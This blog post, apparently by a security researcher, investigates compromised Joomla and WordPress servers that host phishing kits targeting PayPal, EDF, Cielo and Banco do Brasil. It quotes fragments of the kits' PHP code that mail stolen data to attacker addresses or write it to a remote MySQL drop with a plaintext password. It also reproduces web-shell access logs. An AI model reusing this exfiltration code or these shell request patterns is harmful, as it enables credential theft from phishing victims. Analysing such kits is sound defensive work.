Tuesday 15 January 2013

Phish-BankFraud/PHP.Mailer/PHP.Shell

Investigation on some compromised servers used for phishings during these two weeks. (part 2 of Phishing Hunting, a bit more technical now)
The first site is gtmaustralia.com.au, phishing mirrors:
http://www.phishtank.com/phish_detail.php?phish_id=1693107
http://www.phishtank.com/phish_detail.php?phish_id=1693117
Targeting Paypal, the compromised server run Joomla 1.5.20 Stable Release [18-July-2010]

Hacker used a phishing redirector, on another compromised server running Wordpress:
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
VT 0/46 - VT 3/34

Severals backdoors was found:
VT 21/46

And a WSO Shell with obfuscated code to avoid antivirus.
VT 18/46

From server side, resend.php send phished datas to the hacker:
$samaka = "asq01@hotmail.fr";
$subject = "Off $ip";
$from = "From: InfoRmation<google@gmail.com>";
$from .= "-Info\n";
mail($samaka,$subject,$message,$from);

The server was aslo used to target EDF (Electricité de France)
http://www.phishtank.com/phish_detail.php?phish_id=1693109
VT 0/46

Datas are still send via e-mail, sniper.php:
<?php $to = "wait0all@gmail.com"; $ip = getenv("REMOTE_ADDR"

Cielo targeted, VT 5/46
http://www.phishtank.com/phish_detail.php?phish_id=1693131
$headers = "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Cielo <desejovip@hotmail.com";

And also Banco do Brasil, VT 0/46
http://www.phishtank.com/phish_detail.php?phish_id=1693133
It's alot of phishs for just one server and it's not finished, the server was also used for spam:
VT 0/46

VT 9/46

Now by viewing access logs i suspect 41.249.93.120:
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"

Second case (and probably same guys behind)
Phishing targeting EDF: http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.

This time, log files was cleared.
I've posted previous infos including log files on kernelmode. (did they read me ?)

Datats are still send via mail, index3.php:
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";

loginAction.action.php:
$myemail = "jinshoori@gmail.com"; //email hna

And used as spam relay here again:

Shell found this time was a edited version of Backdoor.PHP.WebShell.BD:

On a similar case i coded a tool to retrieve phishing urls from rotators:

Server was satured later:

Open dir:

They make different dirs with phishing pages to evade antivirus:

Last case was a Paypal phish page found by markusg targeting German people.
Server is running wordpress.
http://www.phishtank.com/phish_detail.php?phish_id=1694455

Not same guys, not same technic.
This time, datas are sent to a mySQL db on another compromised server:
mysql_connect("193.107.19.***", "ccs", "LTBDVQ7bYewff5Dc");
mysql_select_db("ccs");
$url = mysql_real_escape_string($_S

'ccs' make me think 'Credit Card Sell'
On the server where datas are sent the hacker use a parser for credit cards.

The server was also used for spam:
VT 5/46

Datas collected are probably used to supply carding shops.

You can find more research/dumped phishing pages/spam tools/additional files here including mail source, and here for dumped backdoors.
Also interesting: Unixfreakjp have do a post about the connection of backdoors and exploit kits here

No comments:

Post a Comment